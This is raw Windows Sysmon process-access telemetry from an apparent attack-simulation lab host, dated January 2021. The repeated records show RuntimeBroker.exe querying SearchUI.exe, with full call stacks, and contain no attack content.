13:30:11.576{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13711|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11706|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11059|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000011548Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.576{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13624|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11706|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11059|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000011547Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.576{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11620|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11059|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011546Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.576{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011545Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.576{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011544Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.576{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011543Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.576{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011542Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.576{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011541Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.576{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011540Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.576{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011539Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.576{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011538Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.576{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011537Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.576{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011536Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.576{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011535Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.576{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011534Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.576{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011533Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.576{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011532Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.576{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011531Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.576{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011530Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 